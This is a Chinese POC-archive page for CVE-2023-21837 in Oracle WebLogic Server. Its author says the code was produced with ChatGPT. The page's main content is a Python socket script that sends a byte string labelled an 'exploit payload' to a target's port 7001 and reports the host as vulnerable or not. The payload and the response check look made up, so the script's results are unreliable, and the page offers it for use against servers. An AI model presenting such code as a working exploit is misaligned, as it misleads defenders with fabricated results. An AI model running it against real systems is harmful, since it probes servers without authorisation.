支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: 25e517365a0b489784f05caf2c618f935f0d93d2

来源
关联漏洞
标题:Oracle WebLogic Server 安全漏洞 (CVE-2023-21837)
Description:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。
Description
POC,EXP, chatGPT for me
介绍
# CVE-2023-21837
POC,EXP, chatGPT for me

## code 
```
import socket

# CVE-2023-21837
def check_vulnerability(target_host, target_port):
    # create socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # set timeout to 30 seconds
    s.settimeout(30)
    try:
        # connect to target
        s.connect((target_host, target_port))
        # send exploit payload
        s.send(b'\x49\x49\x4f\x50\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00')
        # receive response
        response = s.recv(1024)
        # check if response indicates vulnerability
        if b'Y\x02\x0f\x00\x00\x00\x00\x00\x00\x00' in response:
            print(f"Target {target_host}:{target_port} is vulnerable!")
        else:
            print(f"Target {target_host}:{target_port} is not vulnerable.")
    except socket.timeout:
        print(f"Connection to {target_host}:{target_port} timed out.")
    except ConnectionRefusedError:
        print(f"Connection to {target_host}:{target_port} was refused.")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        # close socket
        s.close()

# example usage
check_vulnerability('127.0.0.1', 7001)

```
文件快照

[4.0K] /data/pocs/25e517365a0b489784f05caf2c618f935f0d93d2 └── [1.2K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。